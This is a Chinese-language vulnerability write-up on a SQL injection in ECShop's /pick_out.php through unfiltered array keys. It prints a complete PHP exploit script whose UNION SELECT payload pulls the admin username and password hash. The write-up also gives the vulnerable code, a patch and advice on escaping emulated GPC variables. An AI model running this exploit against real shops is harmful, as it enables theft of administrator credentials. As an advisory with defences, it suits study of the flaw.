標籤:
catalog
1. 漏洞描述2. 漏洞觸發條件3. 漏洞影響範圍4. 漏洞程式碼分析5. 防禦方法6. 攻防思考
1. 漏洞描述
在進行輸入變數本地類比註冊的時候,沒有進行有效GPC類比過濾處理,匯出key鍵注入
Relevant Link:
http://bbs.ecshop.com/thread-150545-1-1.html
2. 漏洞觸發條件
1. /pick_out.php漏洞未修複2. magic_quotes_gpc = Off
0x1: POC
#!/usr/bin/php 複製代碼<?php //本程式只作技術交流,請不要用做非法用途!! print_r(‘ +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit dork: "owered by ECShop" +---------------------------------------------------------------------------+ ‘); /** * works with magic_quotes_gpc = Off */ if ($argc < 3) { print_r(‘ +---------------------------------------------------------------------------+ Usage: php ‘.$argv[0].‘ host path host: target server (ip/hostname) path: path to ecshop Example: php ‘.$argv[0].‘ localhost /ecshop/ +---------------------------------------------------------------------------+ ‘); exit; } error_reporting(7); ini_set(‘max_execution_time‘, 0); $host = $argv[1]; $path = $argv[2]; $resp = send(); preg_match(‘#IN\s\(([\S]+)[a-z0-9]{32})\)#‘, $resp, $hash); if ($hash) exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path; $cmd = ‘cat_id=999999&attr[%27%20UNION%20SELECT%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20WHERE%20action_list%3d%27all%27%20LIMIT%201%23]=ryat‘; $data = "GET ".$path."pick_out.php?".$cmd." HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n\r\n"; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ‘‘; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>
3. 漏洞影響範圍
4. 漏洞程式碼分析
/pick_out.php
../* 處理屬性,擷取滿足屬性的goods_id */if (!empty($_GET[‘attr‘])){ $attr_table = ‘‘; $attr_where = ‘‘; $attr_url = ‘‘; $i = 0; $goods_result = ‘‘; foreach ($_GET[‘attr‘] AS $key => $value) { $attr_url .= ‘&attr[‘ . $key . ‘]=‘ . $value; $attr_picks[] = $key; if ($i > 0) { if (empty($goods_result)) { break; } // 利用key進行注射 $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE goods_id IN (" . implode(‘,‘ , $goods_result) . ") AND attr_id=‘$key‘ AND attr_value=‘$value‘"); } else { $goods_result = $db->getCol("SELECT goods_id FROM " . $ecs->table("goods_attr") . " WHERE attr_id=‘$key‘ AND attr_value=‘$value‘"); } $i++; } ..
5. 防禦方法
/pick_out.php
define(‘IN_ECS‘, true);require(dirname(__FILE__) . ‘/includes/init.php‘);$condition = array();$picks = array();$cat_id = !empty($_GET[‘cat_id‘]) ? intval($_GET[‘cat_id‘]) : 0;/* */if (!empty($_GET[‘attr‘])){ //對輸入數組進行索引值(key、value)正常化處理 foreach($_GET[‘attr‘] as $key => $value) { if (!is_numeric($key)) { unset($_GET[‘attr‘][$key]); continue; } $key = intval($key); $_GET[‘attr‘][$key] = htmlspecialchars($value); }}/* */
Relevant Link:
http://bbs.ecshop.com/thread-86922-1-1.html
6. 攻防思考
GPC自動註冊是PHP提供的原生機制,很多CMS為了保證"無視使用者自身設定",在全域入口代碼中採用了"自動類比GPC註冊"的機制,類似於/*foreach(Array(‘_GET‘,‘_POST‘,‘_COOKIE‘) as $_request){ foreach($$_request as $_k => $_v) ${$_k} = $_v;}*/
但是,在進行類比GPC本地變數註冊的時候,一定要保持安全性的一致性,即要同時類比執行"magic_quotes_gpc = On"機制,即需要對傳入資料的進行[key:value]轉義過濾,例如
function _RunMagicQuotes(&$svar){ if(!get_magic_quotes_gpc()) { if( is_array($svar) ) { foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v); } else { $svar = addslashes($svar); } } return $svar;}foreach(Array(‘_GET‘,‘_POST‘,‘_COOKIE‘) as $_request){ foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);}
Copyright (c) 2015 LittleHann All rights reserved
ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
